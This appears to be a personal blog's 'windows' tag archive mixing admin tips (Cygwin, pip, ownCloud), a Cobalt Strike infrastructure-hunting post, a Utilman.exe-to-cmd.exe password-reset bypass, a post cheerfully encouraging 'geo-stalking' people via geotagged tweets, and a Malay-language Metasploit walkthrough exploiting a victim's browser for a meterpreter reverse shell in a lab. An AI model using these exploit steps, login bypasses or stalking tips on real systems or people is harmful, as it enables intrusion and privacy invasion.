Tag Archives: windows

Hunting for possible attacker Cobalt-Strike infra

Recently, we have an incident where suspicious traffic was observed related to external C2. Initial finding found that this IP 172.241.27.17 (172.241.24.0/21) resolved to
atakai[-]technologies[.]host; according to pDNS in Virustotal [1].

So, further digging on this IP found it has port 50050 open. Based on Recorded Future threat analysis report & Cobalt Strike Team Server Population Study, it mentioned that default port for Cobalt Strike controller is on port 50050.

So, I asked to myself. What if the neighboring IPs were also been setup for Cobalt Strike infrastructure? So I decided to go on this journey…

First, we know that the IP range is 172.241.24.0/21. By using this tool, we can convert CIDR notation to a range of IP addresses.

The result, we have 2048 addresses; IP address range between 172.241.24.0-172.241.31.255.

Next, we using online tool named Reverse IP & DNS API from WhoisXML API. Function of this tools is to reveals all domains that share an IP address. Example as below:

To use this tools, we need to buy credit to leverage its API. As for free account, you only have 100 credit to be use on Domain Research Suite tools. But on this case, we need around 2050 credit. Based on their website, 1000 DRS credits = $19.00. So.. yeah..

After you have enough credit, you can use the script as below:

#!/bin/bash

url="https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=whoisxml_apikey&ip="

for i in $(cat ip.txt); do
	content="$(curl -s "$url$i")"
	echo "$content" >> output.txt
done

Remember to put your API key into the script. It will basically produce result into “output.txt“.

After that, import you result into Excel. Then, we sort and select possible domains from the output based on domain naming convention; e.g. atakai, amatai, amamai:

Now we have possible suspected IPs & domains. To further digging, we’ll leverage Shodan.io to see what are the open port available for those IPs.

To use it, we’ll using script as below:

$ curl -s https://api.shodan.io/shodan/host/{172.241.27.17,172.241.27.44,172.241.27.62,172.241.27.65,172.241.27.66,172.241.27.68,172.241.27.72,172.241.27.225,172.241.29.155,172.241.29.156,172.241.29.157}?key=shodan_apikey | jq -r '. | "IP: \(.ip_str) Ports: \(.ports)"'

The output should be like this:

Now we know 7/11 (no pun intended) IPs been observed by Shodan having port 50050 opened. This indicate that this set of IPs possibly used part of Cobalt Strike infra.

Next step is we can search for date registration for each domain from Whois data. But I’m too lazy to continue this. Also I’ve encountered where several Whois provider giving different info regarding of domain registration date. So yeah, maybe I’ll update next time when I’m free 😉

Import & export installed Cygwin packages

Recently I’ve changed my workstation to new one. Previously I’ve installed bunch of Cygwin packages on my old workstation.

So I thought; can I somehow migrate my installed Cygwin packages from my old workstation to new workstation?

The answer is yes. Follow me along to this wonderful journey XD

First you’ll need to save list of what you have installed on your Cygwin on old workstation.

To do this, open the Cygwin terminal/console & run this command below:

grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

Its basically dump list of installed Cygwin packages in your workstation & save it to text file named “cygwin_packages.txt” with comma-separated.

Next, go to your Cygwin home folder (commonly locate at “C:\cygwin64\home\”), open the “cygwin_packages.txt” file that we save before & copy all the content inside the text file (CTRL-C).

Next, at your new workstation, ensure you have downloaded the latest Cygwin installer “setup-x86.exe” (32-bit) or “setup-x86_64.exe” (64-bit).

Then, open your Windows cmd & change you directory to where you save the Cygwin installer; for my case here, I save it in my Downloads folder “C:\Users\Zam\Downloads”.

Then, run this command below on your Windows cmd; replacing/inserting the content of cygwin_packages.txt inside the double-quote as below:

setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

You should see the Cygwin GUI opened & UAC requesting permission pop-up:

Click “Yes”, go through “Next” button & wait until the installation finished.

Upgrade Python packages at using pip

As you read in the title above; to update your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run as sudo. Probably.

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Installing Owncloud on Nginx (Ubuntu 12.04)

Here I want to share with you on how to create your own sync server like dropbox.
The software that we will use is ownCloud.

But before we start, please ensure that you already have the up & running nginx.
For tutorial, please refer here.

1. Make sure your OS is updated

apt-get update
apt-get upgrade

2. Install required package

apt-get install php5-cgi autoconf automake autotools-dev curl libapr1 libtool curl libcurl4-openssl-dev php-pear php-xml-parser php5 php5-cli php5-common php5-curl php5-dev php5-gd php5-sqlite php5-fpm

3. Edit nginx site config file file

vi /etc/nginx/sites-available/default

4. Edit like this;
Copy line below;

server {
        listen   80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
        server_name _;

        location / {
                try_files $uri $uri/ @webdav;
        }

        location ~ ^/(data|config|.ht|db_structure.xml|README) {
                deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
                root /usr/share/nginx/www;
        }

        location ~ .*.(php|php5)?$ {
                try_files $uri =404;
                fastcgi_split_path_info ^(.+.php)(/.+)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
        }

        location ~ ^/owncloud/remote.php(/.*)$ {
                fastcgi_split_path_info ^(.+.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                include fastcgi_params;
        }

        location @webdav {
                fastcgi_split_path_info ^(.+.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-cgi.sock;
                include fastcgi_params;
        }

        location ~ /.ht {
                deny all;
        }
}

The “root /usr/share/nginx/www” line defines the root directory for nginx.
You can change it to other path you like.

5. Edit /etc/php5/conf.d/xcache.ini
Edit this two line;

xcache.size = 64M
xcache.var_size = 64M

6. Edit /etc/php5/fpm/php.ini
Edit this two line;

post_max_size = 2G
max_upload_size = 2G

7. Reload php5-fpm

/etc/init.d/php5-fpm reload

8. Get latest owncloud file (Latest 4.5 (4.5.5))

wget http://mirrors.owncloud.org/releases/owncloud-4.5.5.tar.bz2

9. Extract it at /usr/share/nginx/www

tar xvf owncloud-4.5.5.tar.bz2

So the path will be /usr/share/nginx/www/owncloud after extracted & the URL will be http://localhost/owncloud

10. Set the directory permissions;

chown -R www-data:www-data /usr/share/nginx/www

Replace ‘/usr/share/nginx/www‘ with your own path you prefered. (The path must be the same with the one in /etc/nginx/sites-available/default)

11. Go to http://localhost/owncloud or http:///owncloud
Create new admin account. Also please unsure that the path on data folder is correct.

12. Create new folder name “clientsync“, something like this;

 
13. Get Desktop Sync Clients at here http://owncloud.org/sync-clients/
Install it. Put your credential accordingly.

14. If everything fines, then your owncloud has been configured properly. Congratz!

Done. Hope it helps. 🙂

Reset Windows Server 2008 R2 password

Reset the administrator/user password on Windows Server 2008 by using Windows Installation Disk

  1. Insert the Windows Server 2008 installation DVD
  2. Restart the computer, select boot from DVD
  3. Choose option “Repair your computer
  4. Select start command prompt
  5. Type in “C:
  6. Then, “CD C:WindowsSystem32
  7. MOVE Utilman.exe Utilman.exe.bak
  8. COPY Cmd.exe Utilman.exe
  9. You may also need to enable the administrator account which can be done by using “NET USER administrator /active:yes
  10. Restart the windows
  11. Then, at the login screen, type Windows-U, this fires up cmd.exe
  12. NET USER  e.g. NET USER administrator Presto!
  13. Now restart the computer again and move the original Utilman.exe back. e.g. MOVE Utilman.exe.bak Utilman.exe

Geo-stalking with Bing Maps and the Twitter Maps App

Geo/Social stalking is fun. Bing Maps has the ability to add various “apps” to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let’s start with somewhere fun, like at German-Malaysian Institute (GMi), Bangi and see who’s tweeting around there.. ;D

First, open www.bing.com/maps/

Then, you can change the view to Aerial View for more nicer look. ;D
You may change to other place you want to view e.g. your home, college, workplace

Then, select Map apps options..

Then, select Twitter Maps apps..

Wait for a while for the page to reload the necessary thing (loading tweet around the map you currently viewing) 

 Aaannndd.. Ta-Da! Happy Stalking. ;D

Thanks to carnal0wnage for this tips. 😉

Metasploit?

Korang pernah tak teringin nak guna metasploit?
Korang penah tak dapat buat satu session menggunakan metasploit?
Aku tak pernah dapat gune metasploit ni.. 🙁

Tapi aku tak pernah mengalah(kecuali perkara2 tertentu)..
Akhirnya aku dapat jugak guna..
Dan dapat jugak access ke PC tu.. 🙂

So, meh aku kongsikan macam mana aku dapat buat benda ni..
Pertama, korang install dulu Metasploit.
Tak kesahlah versi apa2 pun.
Nanti boleh update.

Lepas dah install, jangan lupa untuk update.
Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.

Lepas dan install & update,
korang run kan Metasploit.
Run yang console punya tau.
Sebab orang selalu cakap,
yang pakai CLI ni lagi efektif.
So, korang patut cuba.. 😉

Lepas dah run,
korang taipkan macam ni..

use windows/browser/ms06_001_wmf_setabortproc

Itu adalah exploit yang kita akan gunakan..
Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..

Lepas dah setkan exploit korang,
setkan pulak payload korang..

set payload windows/meterpreter/reverse_tcp

Lepas dah setkan payload tu,
korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Lepas dah setkan suma,
taipkan show options untuk tengok balik semua setting2 korang tu..
Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..

Lepas dah setel semua,
korang taipkan exploit..
Dia akan keluar lebih kurang macam ni..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu..
Barulah menjadi..
Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p

Lepas korang dah bagi mangsa korang bukak URL tu,
korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..

Kalo exploit korang menjadi,
dia akan keluar lebih kurang macam ni..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Dah kena! Korang dah ada 1 session ngan dia..
Bole la korang upload/download dan macam2 lagi kat PC dia..
Meh kita tengok..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:Documents and Settingszer0Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yeay! Saya dah berjaya. Haha..
Benda simple je kot..
Saya rasa orang lain tak pandang pun kalo saya dapat buat macam ni.. 🙁

Anyway, selamat mencuba la ye.
Ada pape, bole tanya saya.. 🙂